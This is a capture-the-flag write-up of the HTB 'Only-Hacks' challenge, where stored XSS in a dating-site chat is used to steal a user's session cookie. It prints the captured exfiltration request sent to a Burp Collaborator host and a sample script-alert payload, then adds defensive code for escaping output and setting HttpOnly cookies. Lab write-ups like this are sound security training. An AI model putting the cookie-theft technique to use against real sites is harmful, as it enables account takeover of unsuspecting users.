While exploring web challenges on HTB, I chose the Only-Hacks challenge. This challenge does not provide any source code files for white-box testing, so let’s begin by clicking “Start Instance” and searching for the flag.
Here is the IP and port of the instance to hack on:
94.237.54.116:34494
After opening the IP in a browser, it loaded a webpage displaying a dashboard.
Most hackers would try SQL Injection here to hack the database and find the flag — I know, man. But that’s not the case this time. So, let’s go with the flow. I decided to take a different approach by signing up.
It’s a dating website similar to Tinder, where you can find your perfect match. As we can see, there’s a profile photo upload feature — I know what you hackers are thinking, trying to get an RCE and capture the flag. But again, I didn’t go that route. Instead, I simply registered an account.
You can like or dislike pictures to find your perfect match. After finishing all the pictures in the match section, I finally got a match with a girl named Renata. So, I casually started a conversation with her, and suddenly, my hacker instinct kicked in — I decided to send an XSS payload in the chat. My Burp Suite proxy was capturing every request.
I figured that if I could execute my XSS payload in her browser, I could steal her session cookies and hijack her session. So, I first sent a normal XSS payload and quickly noticed that the pop-up appeared in both her chat and mine. That confirmed the vulnerability. Then, I crafted a cookie stealer payload to steal her session cookies.
To receive the session cookies, I used Burp Collaborator. I sent the XSS payload again, and soon after, I received an HTTP request containing her session cookies:
GET /?session=eyJ1c2VyIjp7ImlkIjo1LCJ1c2VybmFtZSI6Impob253aWNrIn19.Z7tEgg.82ss6aG_Y47H83tSk29y9obfTl4 HTTP/1.1
Host: vqpojgfi4rntzmnyrthxz14ix930rqff.oastify.com
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://94.237.54.116:34494/
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
I simply replaced my session cookies with hers using the developer console and refreshed the page.
Boom! We successfully achieved account takeover. After getting into her account, we finally found what we were looking for.
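Two defences would have closed this path, and the captured token itself shows why the second one matters. The example below is added here and is not code from the original write-up or from the challenge: it escapes chat messages before they reach HTML (so a stored payload becomes inert text), builds a session Set-Cookie header with HttpOnly so page scripts cannot read the value, and decodes the unencrypted payload part of the cookie from the request above (the `.timestamp.signature` layout is assumed to be an itsdangerous/Flask-style signed session; the signature stops tampering but does nothing against replay of a stolen copy). The function names and the sample messages are constructed for illustration.

```javascript
// Added example: defensive handling for a chat feature like the one in the
// write-up. Function names and sample messages are constructed, not from the
// challenge.

// Escape the characters that let message text break out of an HTML text node
// or attribute value. In the browser the equivalent is assigning the message
// to textContent instead of innerHTML.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable renderer: the message body is interpolated straight into HTML,
// which is the behaviour the write-up exploited.
function renderMessageUnsafe(msg) {
  return `<div class="msg" data-from="${msg.from}">${msg.body}</div>`;
}

// Hardened renderer: every user-controlled field is escaped first.
function renderMessageSafe(msg) {
  return `<div class="msg" data-from="${escapeHtml(msg.from)}">${escapeHtml(msg.body)}</div>`;
}

// Detection helper for a test or a response-body check: does the rendered
// HTML still contain a script element?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Session Set-Cookie header. HttpOnly keeps document.cookie from exposing the
// value to any script that does run, Secure limits it to HTTPS, and
// SameSite=Lax keeps most cross-site requests from carrying it.
function sessionCookieHeader(value, { secure = true } = {}) {
  const parts = [`session=${encodeURIComponent(value)}`, "Path=/", "HttpOnly", "SameSite=Lax"];
  if (secure) parts.push("Secure");
  return parts.join("; ");
}

// Decode the payload segment of a "payload.timestamp.signature" token
// (itsdangerous/Flask-style; an assumption about the challenge's stack).
// The payload is base64url JSON, not encrypted, so anyone holding the cookie
// can read it; only the signature segment requires the server secret.
function decodeSessionPayload(token) {
  const payloadB64 = token.split(".")[0];
  // Node's "base64" decoder accepts the URL-safe alphabet and missing padding.
  return JSON.parse(Buffer.from(payloadB64, "base64").toString("utf8"));
}

// Constructed sample messages; the second mirrors the pop-up payload the
// write-up used to confirm the bug.
const SAMPLE_MESSAGES = [
  { from: "renata", body: "hey, how are you?" },
  { from: "jhonwick", body: "<script>alert(1)</script>" },
];

function demo() {
  for (const msg of SAMPLE_MESSAGES) {
    console.log("unsafe:", renderMessageUnsafe(msg));
    console.log("safe:  ", renderMessageSafe(msg));
  }
  console.log(sessionCookieHeader("opaque-session-id"));
  // Token value taken from the captured request in the write-up.
  console.log(decodeSessionPayload(
    "eyJ1c2VyIjp7ImlkIjo1LCJ1c2VybmFtZSI6Impob253aWNrIn19.Z7tEgg.82ss6aG_Y47H83tSk29y9obfTl4"
  ));
}
demo();
```

Run it with `node` to see the vulnerable and hardened renderings side by side; the decoded payload is `{"user":{"id":5,"username":"jhonwick"}}`, which is why a leaked cookie is a complete identity and should be short-lived and rotated on login.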
Now, we had our flag and successfully solved the challenge! I don’t know if there’s another approach to capturing the flag, but my hacker instinct led me down this path — and it worked perfectly.
Hacking isn’t just about technical skills — it’s about having a creative mind and thinking outside the box.
Thanks for reading.